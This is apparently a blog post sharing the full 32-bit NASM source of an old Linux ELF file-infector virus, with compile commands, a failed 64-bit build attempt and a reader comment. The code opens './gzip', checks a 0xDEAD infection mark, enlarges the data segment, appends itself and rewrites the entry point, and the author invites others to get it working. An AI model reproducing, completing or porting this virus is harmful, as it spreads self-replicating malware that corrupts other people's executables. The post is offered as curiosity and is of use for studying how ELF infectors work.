This is a very old Linux file I found on an old HDD, this is a Linux virus in Assembler source code. This is compiled with nasm into an object file and then with GCC into an executable. I would not want to actually run this, but it is still very interesting code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 | ;**************************************************************************** ; Linux ELF file infection ;**************************************************************************** ; Compile with: ; nasm -f elf hole.asm -o hole.o ; gcc hole.o -o hole [section .text] [global main] hoste: ret main: pusha ; Beginning of the virus ; Push all the parameters call getdelta getdelta: pop ebp sub ebp,getdelta mov eax,125 ; I modify the attributes with lea ebx,[ebp+main] ; mprotect for write in protec- ; ted pages and ebx,0xFFFFF000 ; Round up to pages mov ecx,03000h ; r|w|x attributes mov edx,07h ; We will only need this in int 80h ; the 1st gen, because we'll ; copy us in the data section mov ebx,01h lea ecx,[ebp+texto] mov edx,0Ch ; Show a Hello World with a call sys_write ; write to stdout mov eax,05 lea ebx,[ebp+archivo] ; open file to infect (./gzip) mov ecx,02 ; read/write int 80h mov ebx,eax ; Handle in EBX xor ecx,ecx xor edx,edx ; Go to beginning of file call sys_lseek lea ecx,[ebp+Elf_header] ; Read the ELF header to our mov edx,24h ; variable call sys_read cmp word [ebp+Elf_header+8],0xDEAD ; Check for previous infection jne infectar jmp salir infectar: mov word [ebp+Elf_header+8],0xDEAD ; The mark is on the 2 first ; fill bytes in the ident struc mov ecx,[ebp+e_phoff] ; e_phoff is a ptr to the PH add ecx,8*4*3 ; Obtain 3rd entry of data seg push ecx xor edx,edx call sys_lseek ; Go to that position lea ecx,[ebp+Program_header] ; Read the entry mov edx,8*4 call sys_read add dword [ebp+p_filez],0x2000 ; increase segment size in add dword [ebp+p_memez],0x2000 ; memory and in the file ; The size to add must be superior to the size of the virus, because besides ; copy the virus, we have also to copy the section table, located before ; and it is not mapped into mem by default. It could be shifted (for avoid ; copying it) but for simplycity reasons i don't do that. pop ecx xor edx,edx call sys_lseek ; back to entry position lea ecx,[ebp+Program_header] mov edx,8*4 call sys_write ; Write entry to the file xor ecx,ecx mov edx,02h call sys_lseek ; Go to file end ; EAX = File Size, that will be phisical offset of the virus mov ecx,dword [ebp+oldentry] mov dword [ebp+temp],ecx mov ecx,dword [ebp+e_entry] mov dword [ebp+oldentry],ecx sub eax,dword [ebp+p_offset] add dword [ebp+p_vaddr],eax mov eax,dword [ebp+p_vaddr] ; EAX = New entrypoint mov dword [ebp+e_entry],eax ; These are the calculations of the new entry address, that will point to the ; code of the virus. For calculate the virtual address of the virus in memory ; i move the pointer to the end of the file with lseek, so the EAX register ; will have the phisical size of the file (i.e. the physical position of the ; virus in the file). ; If to that position i substract the physical position of the beginning of ; the data segment, i will have the virus position relative to the beginning ; of the data segment, and if i add to it the virtual address of the segment ; i will obtain the virtual address of the virus in memory. lea ecx,[ebp+main] mov edx,virend-main call sys_write ; Write the virus to the end xor ecx,ecx xor edx,edx call sys_lseek ; Set pointer to beginning of ; the file lea ecx,[ebp+Elf_header] mov edx,24h call sys_write ; Modify header with new EIP mov ecx,dword [ebp+temp] mov dword [ebp+oldentry],ecx salir: mov eax,06 ; Close the file int 80h popa db 068h ; Opcode of a PUSH oldentry: dd hoste ; back to infected program ret sys_read: ; EBX = Must be File Handle mov eax,3 int 80h ret sys_write: ; EBX = Must be File Handle mov eax,4 int 80h ret sys_lseek: ; EBX = Must be File Handle mov eax,19 int 80h ret dir dd main dw 010h archivo db "./gzip",0 ; File to infect datos db 00h temp dd 00h ; Save oldentry temporally ;**************** Data Zone ************************************************* newentry dd 00h ; New virii EIP newfentry dd 00h myvaddr dd 00h texto db 'HELLO WORLD',0h Elf_header: e_ident: db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h e_type: db 00h,00h e_machine: db 00h,00h e_version: db 00h,00h,00h,00h e_entry: db 00h,00h,00h,00h e_phoff: db 00h,00h,00h,00h e_shoff: db 00h,00h,00h,00h e_flags: db 00h,00h,00h,00h e_ehsize: db 00h,00h e_phentsize: db 00h,00h e_phnum: db 00h,00h e_shentsize: db 00h,00h e_shnum: db 00h,00h e_shstrndx: db 00h,00h jur: db 00h,00h,00h,00h Program_header: p_type db 00h,00h,00h,00h p_offset db 00h,00h,00h,00h p_vaddr db 00h,00h,00h,00h p_paddr db 00h,00h,00h,00h p_filez db 00h,00h,00h,00h p_memez db 00h,00h,00h,00h p_flags db 00h,00h,00h,00h p_align db 00h,00h,00h,00h Section_entry: sh_name db 00h,00h,00h,00h sh_type db 01h,00h,00h,00h sh_flags db 03h,00h,00h,00h ;alloc sh_addr db 00h,00h,00h,00h sh_offset db 00h,00h,00h,00h sh_size dd (virend-main)*2 sh_link db 00h,00h,00h,00h sh_info db 00h,00h,00h,00h sh_addralign db 01h,00h,00h,00h sh_entsize db 00h,00h,00h,00h virend: ;**************************************************************************** |
Compiling it partway has worked.
┌──(john㉿DESKTOP-PF01IEE)-[/mnt/c/Users/Intel i5/Documents] └─$ nasm -f elf virus.asm -o virus.o |
But as this is 32bit code, I cannot get it to compile on a 64bit system with GCC.
I try to build a 64-bit object file, but it fails.
┌──(john㉿DESKTOP-PF01IEE)-[/mnt/c/Users/Intel i5/Documents] └─$ nasm -f elf64 virus.asm -o virus.o virus.asm:16: error: instruction not supported in 64-bit mode virus.asm:20: error: instruction not supported in 64-bit mode virus.asm:60: error: instruction not supported in 64-bit mode virus.asm:76: error: instruction not supported in 64-bit mode virus.asm:130: error: instruction not supported in 64-bit mode |
Maybe someone else can get this working though, it is interesting code.
This is an interesting code, indeed!
Funny thought i had was that maybe it’s not code for neither 32 bit nor 64 bit OS :))